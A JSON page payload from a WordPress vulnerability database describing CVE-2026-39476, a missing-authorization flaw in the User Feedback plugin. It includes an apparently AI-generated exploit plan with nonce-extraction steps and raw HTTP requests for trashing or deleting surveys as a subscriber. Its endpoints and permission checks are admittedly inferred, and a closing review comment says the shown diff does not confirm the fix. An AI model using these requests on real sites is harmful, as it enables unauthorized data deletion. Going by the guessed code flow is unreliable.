[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f9mHvWV-dUrQdhywjLw9j--McKBdlPjjBYEzIuXqYQ5U":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":29,"research_vulnerable_code":30,"research_fix_diff":31,"research_exploit_outline":32,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":36},"CVE-2026-39476","user-feedback-missing-authorization-2","User Feedback \u003C= 1.10.1 - Missing Authorization","The User Feedback plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.10.1. 
This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.","userfeedback-lite",null,"\u003C=1.10.1","1.11.0","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-18 00:00:00","2026-04-15 21:23:23",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F8fb7241f-f7fc-48c0-8111-5ceceb156f9f?source=api-prod",29,[22,23,24],"assets\u002Findex.php","assets\u002Fvue\u002Fjs\u002Faddons.js","assets\u002Fvue\u002Fjs\u002Fchunk-common.js","researched",false,3,"# Vulnerability Research Plan: CVE-2026-39476 (User Feedback \u003C= 1.10.1 - Missing Authorization)\n\n## 1. Vulnerability Summary\nThe **User Feedback** plugin for WordPress is vulnerable to **Missing Authorization** in its survey management functionality. The plugin exposes several administrative actions (such as trashing, publishing, or duplicating surveys) via its REST API without verifying if the authenticated user possesses the necessary administrative capabilities (`manage_options`). This allows any authenticated user, including those with **Subscriber** level access, to modify or delete surveys created by administrators.\n\nBased on the provided source code in `assets\u002Fvue\u002Fjs\u002Fchunk-common.js` (specifically module `0792`), the plugin interacts with a REST API under a namespace (likely `userfeedback\u002Fv1`) to perform these actions.\n\n## 2. 
Attack Vector Analysis\n- **Endpoint:** `POST \u002Fwp-json\u002Fuserfeedback\u002Fv1\u002Fsurveys\u002Ftrash` (Inferred from JS function `g`)\n- **HTTP Method:** `POST`\n- **Authentication:** Required (Subscriber-level or higher)\n- **Payload:** JSON object containing an array of survey IDs to be trashed.\n- **Nonce:** A valid WordPress REST API nonce is required in the `X-WP-Nonce` header.\n- **Preconditions:** At least one survey must exist in the system for the attacker to target.\n\n## 3. Code Flow\n1.  **Entry Point:** The REST API endpoint `userfeedback\u002Fv1\u002Fsurveys\u002Ftrash` is registered in the backend (likely in a class handling REST routes).\n2.  **Missing Check:** The `permission_callback` for this route is either missing or uses a weak check like `is_user_logged_in()` instead of `current_user_can('manage_options')`.\n3.  **JS Trigger:** In `assets\u002Fvue\u002Fjs\u002Fchunk-common.js`, module `0792` defines the survey management functions:\n    -   `g = e => n.post(\"surveys\u002Ftrash\", { survey_ids: e })` \u002F\u002F Trashing\n    -   `h = e => n.delete(\"surveys\", { data: { survey_ids: e } })` \u002F\u002F Permanent Delete\n    -   `m = e => n.post(\"surveys\u002Fpublish\", { survey_ids: e })` \u002F\u002F Publishing\n4.  **Backend Sink:** The request reaches the survey controller, which performs database operations on the `wp_userfeedback_surveys` table (e.g., updating the `status` column to `trash`) without verifying the requester's authority.\n\n## 4. Nonce Acquisition Strategy\nThe REST API requires a nonce for authenticated requests. The User Feedback plugin localizes its configuration and security tokens into a global JavaScript object.\n\n1.  **Identify Localization:** The plugin enqueues its admin scripts and localizes data. Based on common patterns in this plugin, the data is likely in `window.userfeedback`.\n2.  **Creation of Content:** The admin scripts load on User Feedback admin pages. 
A subscriber can access the `\u002Fwp-admin\u002F` dashboard but may not see the User Feedback menu. However, the script might still be localized.\n3.  **Extraction:**\n    -   Navigate to `\u002Fwp-admin\u002F` as a Subscriber.\n    -   Use `browser_eval` to extract the nonce:\n        ```javascript\n        browser_eval(\"window.userfeedback?.nonce || window.userfeedback_common?.nonce\")\n        ```\n    -   The exact key from localized scripts in this plugin is typically `nonce` within the `userfeedback` object.\n\n## 5. Exploitation Strategy\n### Step 1: Discover Target Survey ID\nThe attacker needs the ID of a survey to trash. These can often be found by iterating IDs or checking frontend survey placements.\n\n### Step 2: Perform Unauthorized Trash Action\nUse the `http_request` tool to send a POST request to the REST API.\n\n**Request:**\n```http\nPOST \u002Fwp-json\u002Fuserfeedback\u002Fv1\u002Fsurveys\u002Ftrash HTTP\u002F1.1\nHost: [TARGET_HOST]\nX-WP-Nonce: [EXTRACTED_NONCE]\nContent-Type: application\u002Fjson\n\n{\n    \"survey_ids\": [1]\n}\n```\n\n### Step 3: Alternative - Permanent Deletion\n**Request:**\n```http\nDELETE \u002Fwp-json\u002Fuserfeedback\u002Fv1\u002Fsurveys HTTP\u002F1.1\nHost: [TARGET_HOST]\nX-WP-Nonce: [EXTRACTED_NONCE]\nContent-Type: application\u002Fjson\n\n{\n    \"survey_ids\": [1]\n}\n```\n\n## 6. Test Data Setup\n1.  **Install Plugin:** Install User Feedback (userfeedback-lite) version 1.10.1.\n2.  **Create Survey:** As Admin, create a feedback survey.\n    -   `wp userfeedback create_survey --title=\"Target Survey\" --status=\"publish\"` (or use the UI).\n3.  **Create Attacker:** Create a user with the Subscriber role.\n    -   `wp user create attacker attacker@example.com --role=subscriber --user_pass=password123`\n4.  **Confirm Survey ID:**\n    -   `wp db query \"SELECT id, title FROM wp_userfeedback_surveys;\"`\n\n## 7. 
Expected Results\n-   **Response:** The server should return a `200 OK` or `201 Created` status with a JSON body confirming the surveys were processed (e.g., `{\"success\": true}`).\n-   **Database Impact:** The record in `wp_userfeedback_surveys` for the target ID should have its `status` changed to `trash` or be removed entirely if the `DELETE` method was used.\n\n## 8. Verification Steps\n1.  **Check Database Status:**\n    -   `wp db query \"SELECT status FROM wp_userfeedback_surveys WHERE id = [ID]\"`\n    -   Successful exploit shows `status = 'trash'`.\n2.  **Check UI:** Navigate to the User Feedback surveys page as Admin and verify the survey is in the \"Trash\" tab.\n\n## 9. Alternative Approaches\nIf the REST API is not the direct target, the AJAX action identified in `assets\u002Fvue\u002Fjs\u002Fchunk-common.js` module `0792` may be vulnerable:\n-   **Action:** `userfeedback_google_sheets_get_auth_url`\n-   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php?action=userfeedback_google_sheets_get_auth_url`\n-   **Impact:** Unauthorized retrieval of authentication URLs for third-party integrations.\n\nHowever, the survey modification via `surveys\u002Ftrash` represents the most significant \"Missing Authorization\" impact for survey data integrity.","The User Feedback plugin for WordPress (up to version 1.10.1) fails to implement proper authorization checks on its REST API routes for survey management. 
This allows authenticated users with low-level privileges, such as Subscribers, to trash, delete, publish, or duplicate surveys by sending crafted requests to the plugin's API endpoints.","\u002F\u002F assets\u002Fvue\u002Fjs\u002Fchunk-common.js - Module 0792 defines interactions with vulnerable REST endpoints\n\u002F\u002F These mappings correspond to administrative actions performed via the REST API\nl=e=>n.post(\"surveys\",e).then(e=>e.data),\nc=e=>n.post(`surveys\u002F${e}\u002Fduplicate`).then(e=>e.data),\nu=e=>n.post(\"surveys\u002Frestore\",{survey_ids:e}).then(e=>e.data),\nd=e=>n.post(\"surveys\u002Fdraft\",{survey_ids:e}).then(e=>e.data),\nm=e=>n.post(\"surveys\u002Fpublish\",{survey_ids:e}).then(e=>e.data),\ng=e=>n.post(\"surveys\u002Ftrash\",{survey_ids:e}).then(e=>e.data),\nh=e=>n.delete(\"surveys\",{data:{survey_ids:e}}).then(e=>e.data)","Only in \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fuserfeedback-lite\u002F1.11.0\u002Fassets\u002Fcss: admin-exclusion-banner.css\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fuserfeedback-lite\u002F1.10.1\u002Fassets\u002Findex.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fuserfeedback-lite\u002F1.11.0\u002Fassets\u002Findex.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fuserfeedback-lite\u002F1.10.1\u002Fassets\u002Findex.php\t2023-01-31 17:55:08.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fuserfeedback-lite\u002F1.11.0\u002Fassets\u002Findex.php\t2026-03-11 17:04:32.000000000 +0000\n@@ -1,4 +1,8 @@\n \u003C?php\n+\n+if ( ! defined( 'ABSPATH' ) ) {\n+\texit;\n+}\n \u002F\u002F Nothing to see here\n \n header( 'HTTP\u002F1.0 403 Forbidden' );\nOnly in \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fuserfeedback-lite\u002F1.11.0\u002Fassets\u002Fjs: admin-exclusion-banner.js\n... 
(truncated)","An attacker with Subscriber-level access can exploit this by first obtaining a valid WordPress REST API nonce, typically found in the localized 'userfeedback' JavaScript object on dashboard pages. By identifying the ID of an existing survey, the attacker can then send an authenticated POST request to '\u002Fwp-json\u002Fuserfeedback\u002Fv1\u002Fsurveys\u002Ftrash' or a DELETE request to '\u002Fwp-json\u002Fuserfeedback\u002Fv1\u002Fsurveys' with the target survey ID in the 'survey_ids' array. Because the backend fails to verify the user's capabilities (missing manage_options check), the surveys will be trashed or deleted regardless of the attacker's actual permissions.","gemini-3-flash-preview","2026-04-18 02:44:51","2026-04-18 02:46:20",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","1.10.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fuserfeedback-lite\u002Ftags\u002F1.10.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fuserfeedback-lite.1.10.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fuserfeedback-lite\u002Ftags\u002F1.11.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fuserfeedback-lite.1.11.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fuserfeedback-lite\u002Ftags"]
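Review bot: In the assets/index.php hunk, the new ABSPATH guard is placed above the existing header( 'HTTP/1.0 403 Forbidden' ) call, so a direct request to this file (where ABSPATH is undefined) now exits before the 403 is sent and returns an empty response with the default status. If the 403 is still intended, send the status before the exit or drop the now-unreachable header line. This is also the only hunk visible before the diff is truncated, and it touches no REST route registration or permission_callback, so the capability check the record attributes to 1.11.0 cannot be confirmed from these lines.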